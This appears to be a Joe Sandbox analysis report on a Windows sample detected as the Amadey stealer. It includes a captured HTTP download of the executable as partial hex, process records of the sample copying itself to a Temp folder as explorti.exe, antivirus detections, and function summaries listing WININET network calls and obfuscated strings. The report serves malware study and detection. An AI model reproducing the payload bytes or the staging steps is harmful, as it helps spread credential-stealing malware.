Sep 1, 2024 20:09:06.811089039 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 18:09:06 GMT Content-Type: application/octet-stream Content-Length: 1826304 Last-Modified: Sun, 01 Sep 2024 15:41:45 GMT Connection: keep-alive ETag: "66d48b39-1bde00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 a0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 69 00 00 04 00 00 f8 9a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELMfB"i@i@P#d# #<@.rsrc #L@.idata #L@ +$N@agodkpebp OhP@frgsmfqfi@.taggant0i"@
Sep 1, 2024 20:09:06.811148882 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 1, 2024 20:09:06.811161041 CEST	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 1, 2024 20:09:06.811388016 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 1, 2024 20:09:06.811469078 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 3zT*X'O+aX'7
Sep 1, 2024 20:09:06.811481953 CEST	1236	IN	Data Raw: 76 20 ba 83 59 22 d8 2a cd 88 4e 0a a6 78 7a b9 79 51 b1 48 32 62 6e b2 76 dc 24 5b 93 56 d8 93 6b f2 3c 8c f3 ba b3 a0 39 38 61 77 eb 90 22 6b 76 7a c9 e9 a1 1c 61 dd 95 03 6d b3 7a 3f ae 1a 19 7e 9c c1 da 8b 6f b3 3b d7 b7 b1 90 20 86 c9 93 72 Data Ascii: v Y"*NxzyQH2bnv$[Vk<98aw"kvzamz?~o; rjx>}y2Xy#Fa?F7%._bBhH61C:dDaevnz\{ofi%p3:0GKmCk$?$<csrM=%S7 <A&5
Sep 1, 2024 20:09:06.811491966 CEST	1236	IN	Data Raw: c1 7a ed 87 2e 86 87 4e 5a 44 6d b6 5e 22 08 25 04 bd 20 7a bd 93 26 35 5d 78 2e 6a fb 3b 8f 09 76 39 56 6a b4 88 9d 21 6f 78 65 b6 05 ba 2d b6 b4 8a b5 68 41 8e 5c d3 41 ef 7a c0 03 77 87 3f 52 2f ac 53 54 9a 20 6d c9 c2 fe 4f 39 68 64 b9 03 60 Data Ascii: z.NZDm^"% z&5]x.j;v9Vj!oxe-hA\Azw?R/ST mO9hd`-o{qH>q9WTto"jzcn8[mj9{w\|cq8Nq%h-HR{%mjjb;Q;\UN[,\skZ^jYV\EM_U@"tL9N
Sep 1, 2024 20:09:06.812215090 CEST	1236	IN	Data Raw: c0 3e 67 10 77 56 4d fe cd 82 b6 17 95 04 4c 13 42 9a be 1f 53 93 ff ad a5 96 3f 77 19 2b e2 be 75 44 b2 0a 7a 56 b5 2f 71 5e 24 9f 49 8a 8f 33 94 a5 f2 77 6c 89 87 87 49 78 6e 9a 7a 40 61 fe b5 82 b6 4b 95 8b 4e 2f 1b 48 8c 47 42 0a a6 c3 97 93 Data Ascii: >gwVMLBS?w+uDzV/q^$I3wlIxnz@aKN/HGB'}JM*}&Ix>Ag/3t&Tvmms13r@Z&r66?CYj(q#5'Y".7rJ>J>CyT`xZwqt.:
Sep 1, 2024 20:09:06.812232971 CEST	1236	IN	Data Raw: e0 06 03 a2 34 98 39 82 30 78 42 98 92 53 a2 a2 ec 98 22 82 10 82 dd 2b 44 3b b5 db 59 26 28 7d f5 82 78 53 29 78 76 8e 74 49 4d c3 1a 8a a1 53 e9 7e 91 fb d5 7d 94 ae bc c0 59 9a 34 8e e7 a5 73 9b 2f f7 ca 5e ee b2 08 3e 67 b3 79 06 b5 ab 30 02 Data Ascii: 490xBS"+D;Y&(}xS)xvtIMS~}Y4s/^>gy0\| AJCBrlsJeR$H5!}+pscsvJ{3J&G}m>s<re]4x`5i&t2{qhx2CAI}9AXh~
Sep 1, 2024 20:09:06.812244892 CEST	1236	IN	Data Raw: a3 3a 21 74 ac 8a d2 a5 71 aa ad 2e 30 5b b3 62 5d 14 62 8c 30 a1 ac 47 6c 08 e5 a2 98 7f 25 0b 07 9e 7c 4a 65 c0 aa a3 94 7c 5e d4 43 40 96 4b 1c 3c 9c cb 42 5a 67 9c 61 f2 6e 8d 88 0a 87 e4 7a 1a 28 8c 97 92 81 4f 89 f8 7a 7c 78 de 76 33 50 b9 Data Ascii: :!tq.0[b]b0Gl%\|Je\|^C@K<BZganz(Oz\|xv3P%/\|~k\|B7RvB%7;"J&Px}g=v65xoB#&g2mxi4UqBrvbsrR*ss
Sep 1, 2024 20:09:06.816607952 CEST	1236	IN	Data Raw: e5 82 3b f7 ee e2 31 73 b5 48 10 d7 73 7f d9 96 28 e1 30 35 13 4a ae cf d6 3a 0a f8 c1 41 61 cf 43 83 f4 25 fe 3a a6 8b da e1 f5 60 1c 88 53 51 4c 76 70 86 77 9b 13 2b a5 02 a5 17 11 98 68 c8 5b 9b 02 7f dd 68 46 ab 31 4f 5c bd c8 aa e4 96 f4 56 Data Ascii: ;1sHs(05J:AaC%:`SQLvpw+h[hF1O\V!\|iPzlzyD~(SKx!}AESaaAr&xDLq.cs?"Yrx?-OLLGE?tc{%{yWaOP3g(N"}!4&S}

Target ID:	0
Start time:	14:07:52
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x850000
File size:	1'884'672 bytes
MD5 hash:	457D9A15D305DF62FE34C5076F3CAD9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1702163974.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1661714987.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:07:56
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0xa00000
File size:	1'884'672 bytes
MD5 hash:	457D9A15D305DF62FE34C5076F3CAD9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1743489529.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1701960720.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 55%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:07:56
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0xa00000
File size:	1'884'672 bytes
MD5 hash:	457D9A15D305DF62FE34C5076F3CAD9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:09:00
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0xa00000
File size:	1'884'672 bytes
MD5 hash:	457D9A15D305DF62FE34C5076F3CAD9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2334522484.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 054C0E69 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a93cb2d840f96a353fd51b2aa1cf2fed3d35a3751bd833454343d1961ffd5c
Instruction ID: 86bad6376bfa9267998734e16e6433134b710634fab8df31f828c4ed0c33f221
Opcode Fuzzy Hash: 48a93cb2d840f96a353fd51b2aa1cf2fed3d35a3751bd833454343d1961ffd5c
Instruction Fuzzy Hash: 7E014CEF18C111BD7082C5816B189FAAB6FE5E7B3037084BBF44AC2506E6D54A4E6131

Function 054C0F08 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35818c3a045e89bb19b60679719859aefee02af94d7f627a780511e9d952db2e
Instruction ID: e1ed6397f2f55962a2151dd1d8f4592b42f9a3f96f021fe7e5b4203bf7f95f5a
Opcode Fuzzy Hash: 35818c3a045e89bb19b60679719859aefee02af94d7f627a780511e9d952db2e
Instruction Fuzzy Hash: 7A1104BF58E250ADB142C5616A18AFB7F2EE5D3A3033148ABF45ACA042E2944A4F9171

Function 054C0E7E Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ba515b7599ec4258b5eb1d3044eb04a7792c83e800bb22d84a882c819750da
Instruction ID: a58ebc63692b51ea8f988086fc05dcbcbbe467cab44dc0f82256b791a0cc0ebd
Opcode Fuzzy Hash: 79ba515b7599ec4258b5eb1d3044eb04a7792c83e800bb22d84a882c819750da
Instruction Fuzzy Hash: 65011AFF18D110BDB082C5816B189FAAB6FE5D7B3033184BBF44AC2506E6D58A4E6131

Function 054C0E93 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3919c20cc24086de7911b03fb7a207c7cdc70793f356e29b4371cacc7031bd32
Instruction ID: 60386c4d34bdc0c70fb3811dcfab8f308237f7cfb2d6cf3185df62f0f6414731
Opcode Fuzzy Hash: 3919c20cc24086de7911b03fb7a207c7cdc70793f356e29b4371cacc7031bd32
Instruction Fuzzy Hash: 5001E8EF189110ADB082C1926B189FAAF6EE4E2730331887BF44AC2506E6D54B4E6031

Function 054C0EA3 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93792207c8aac391a108f6c870b6f0c1adfdfdb84989272dcb14708f737caaf3
Instruction ID: 1cfa036ac6d4114dd9f84a461c3c62ad2ef3b06589ff31670e634787b2c26ba8
Opcode Fuzzy Hash: 93792207c8aac391a108f6c870b6f0c1adfdfdb84989272dcb14708f737caaf3
Instruction Fuzzy Hash: 87F031FF58D110BD7041C19237189FAAB6FE1D2B30331C47BF80AC2542E6D54A4E5031

Function 054C0EBD Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da2d4b85a67c969e7eb79e271bc23a6294610f14a41e1b2bf5bab1acd6b3423
Instruction ID: d3c8042661a8303e7161b4f4fb4255cd35f53edfcd375dce51e89aaf4c8a0f9c
Opcode Fuzzy Hash: 9da2d4b85a67c969e7eb79e271bc23a6294610f14a41e1b2bf5bab1acd6b3423
Instruction Fuzzy Hash: D7F0A4FF14C110ADF14281912B1C9FAAB2EE5E363033084BBF446C2102E2D54B0E6131

Function 054C0EEA Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738e371d61b9b99b831b6eca3c0f4d8bd7e438d166afc51ef3e869e271ec0dfc
Instruction ID: f06084a463d0049c81608add50f743f4f9387822d4e6df3a23f3f24d87cdc8d2
Opcode Fuzzy Hash: 738e371d61b9b99b831b6eca3c0f4d8bd7e438d166afc51ef3e869e271ec0dfc
Instruction Fuzzy Hash: 7FE0C0EF58D0106D7045D5927B2C9FA6B2EE0D26303318877F446C5406E6C54B4F2071

Non-executed Functions

Function 054C0A4A Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704071886.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cb8e58b144042fa657c5f94587ab14a6afd89b1fb7b17576c337b98e3331d1
Instruction ID: 362e45c4c9fd85765eca9db964de45edef62cd6ae2047551a9e611afee28caca
Opcode Fuzzy Hash: d0cb8e58b144042fa657c5f94587ab14a6afd89b1fb7b17576c337b98e3331d1
Instruction Fuzzy Hash: 6FF044AE54E2A1DE86D6C5B5129D1EA3FA7A6B323032015AFD08BC6B42D24B06868150

Analysis Process: explorti.exePID: 7756, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	1928
Total number of Limit Nodes:	105

Executed Functions

Function 00A0BD60 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00A58D68,00000000,00000000,00000000,00000000), ref: 00A0BDEC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A0BE11
HttpSendRequestA.WININET(?,00000000), ref: 00A0BF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 00A0BFCD
InternetCloseHandle.WININET(?), ref: 00A0C0A7
InternetCloseHandle.WININET(?), ref: 00A0C0AF
InternetCloseHandle.WININET(?), ref: 00A0C0B7

Strings

PG3NVu==, xrefs: 00A0BE33
invalid stoi argument, xrefs: 00A0E404
PoPn, xrefs: 00A0D516
6JLUcBRYEz9=, xrefs: 00A0C385
stoi argument out of range, xrefs: 00A0E3FA
6JLUcxtnEx==, xrefs: 00A0C2EB, 00A0C543

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$invalid stoi argument$stoi argument out of range
API String ID: 3632815558-884042532
Opcode ID: 7c6003c44dc366b95cdf095e774aa95410e85f8133989492875bf6a788d7b0fa
Instruction ID: cdb0c4c33af337fc6d190082abbd7cfb5906cbd825da6b5c9acde784aa44e9b9
Opcode Fuzzy Hash: 7c6003c44dc366b95cdf095e774aa95410e85f8133989492875bf6a788d7b0fa
Instruction Fuzzy Hash: 5FB1E4B1A101189BEB28DF28DD84BDEBB75EF45314F5042A9F508972C2D7749AC0CBA4

Function 00A0E440 Relevance: 14.8, Strings: 11, Instructions: 1000
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

246122658369, xrefs: 00A0F647, 00A0F924, 00A104F7, 00A108AA
UFy=, xrefs: 00A0F62D, 00A0F90A
#, xrefs: 00A10534
SC==, xrefs: 00A0EA1F, 00A0EC66
UVy=, xrefs: 00A1088D
UVu=, xrefs: 00A104DA
111, xrefs: 00A0F6B0
0657d1, xrefs: 00A0FA9E
KIG+, xrefs: 00A0E734
EpPoaRV1, xrefs: 00A0E47F
KS==, xrefs: 00A0E4A5

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$UVy=
API String ID: 0-3836280467
Opcode ID: c1b5fdc5e2ee20f3247851f4fa75da00eca2d4ff6451667bdc220c10ae3acc21
Instruction ID: 14c063d51fda9e5364d874448982214552508b46b3500581175d196038ce12f7
Opcode Fuzzy Hash: c1b5fdc5e2ee20f3247851f4fa75da00eca2d4ff6451667bdc220c10ae3acc21
Instruction Fuzzy Hash: BD82D67090424CDBEF14EF68CA497DE7FB6AB46304F508598E805673C2D7759A88CBD2

Function 00A1D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00A0247E

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 368323c149c7cba687071d1f01ebe96af6df0eb899688c10d111f2b57ccaf414
Instruction ID: d5565e9b960120931f5fce6563ea55daec72fa1a962576dfac2030f415a52b01
Opcode Fuzzy Hash: 368323c149c7cba687071d1f01ebe96af6df0eb899688c10d111f2b57ccaf414
Instruction Fuzzy Hash: 0351CEB2E01A058FDB19CFA8E8957AEB7F0FB18350F24856AD405EB290D3B49D81CF50

Function 00A13550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00A1425F

Part of subcall function 00A17870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00A1795C
Part of subcall function 00A17870: __Cnd_destroy_in_situ.LIBCPMT ref: 00A17968
Part of subcall function 00A17870: __Mtx_destroy_in_situ.LIBCPMT ref: 00A17971

Strings

75G0, xrefs: 00A15470
UIrm, xrefs: 00A13BD9
6YK0, xrefs: 00A15502
246122658369, xrefs: 00A11EA5, 00A127EE, 00A12A43, 00A12AB0, 00A12E88, 00A13373, 00A133D4, 00A14F3A, 00A14F4D, 00A14F8F, 00A14F99, 00A154F4
9pG0, xrefs: 00A154DB
invalid stoi argument, xrefs: 00A12DE9, 00A12DF8, 00A1425A, 00A14E9D
8IG0, xrefs: 00A153F5
5120, xrefs: 00A13ABF, 00A13BAA
84K0, xrefs: 00A15497
stoi argument out of range, xrefs: 00A12E02, 00A14269, 00A14EAC
TZS0, xrefs: 00A1537A
KIK+, xrefs: 00A147BD, 00A148EC, 00A14ADC, 00A14C0B
FAml, xrefs: 00A1378F
TZC0, xrefs: 00A1541E
85K3cq==, xrefs: 00A14712
T4Ve, xrefs: 00A13DC0
7JS0, xrefs: 00A15351
9YY0, xrefs: 00A153CC
IEYUMK==, xrefs: 00A154B9
Dy==, xrefs: 00A1369E, 00A14D2D
", xrefs: 00A13E99
UIU0, xrefs: 00A153A3
UZbf, xrefs: 00A13AEE
8lU=, xrefs: 00A16383
7470, xrefs: 00A1531D
0657d1, xrefs: 00A15489
Toe0, xrefs: 00A15447
KIG+, xrefs: 00A14776, 00A147ED, 00A14A95, 00A14B0C

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$0657d1$246122658369$5120$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$FAml$IEYUMK==$KIG+$KIK+$T4Ve$TZC0$TZS0$Toe0$UIU0$UIrm$UZbf$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-4111701409
